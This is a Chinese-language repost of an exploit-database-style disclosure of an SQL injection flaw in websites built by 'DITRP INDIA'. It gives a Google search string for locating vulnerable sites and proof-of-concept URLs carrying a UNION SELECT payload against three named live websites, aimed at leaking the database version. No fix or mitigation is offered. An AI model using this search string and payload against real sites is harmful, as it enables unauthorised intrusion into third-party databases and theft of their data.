DITRP INDIA网站SQL注入漏洞技术分析

本文详细披露了在多个使用“DITRP INDIA”设计的网站上发现的SQL注入漏洞,包括漏洞的Google搜索语法、风险等级、测试环境及具体的概念验证攻击向量,涉及数据库版本信息泄露等实质性技术内容。

DITRP INDIA - SQL 注入

2025.08.28 漏洞提交者: behrouz mansoori

风险等级: 中等

本地利用:

远程利用:

CVE 编号: N/A

CWE 编号: N/A

搜索语法: “designed by : DITRP INDIA”

#漏洞标题: DITRP INDIA - SQL 注入 #日期: 2025-08-09 #漏洞发现者: Behrouz Mansoori #Google 搜索语法: “designed by : DITRP INDIA” #类别: webapps #测试环境: Mac, Firefox 概念验证:

演示 :

https://dishapunjab.com/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+

https://aarushcomputer.com/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+

https://www.ishaqcomputers.co.in/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+

#发现者: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: mr.mansoori@yahoo.com

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次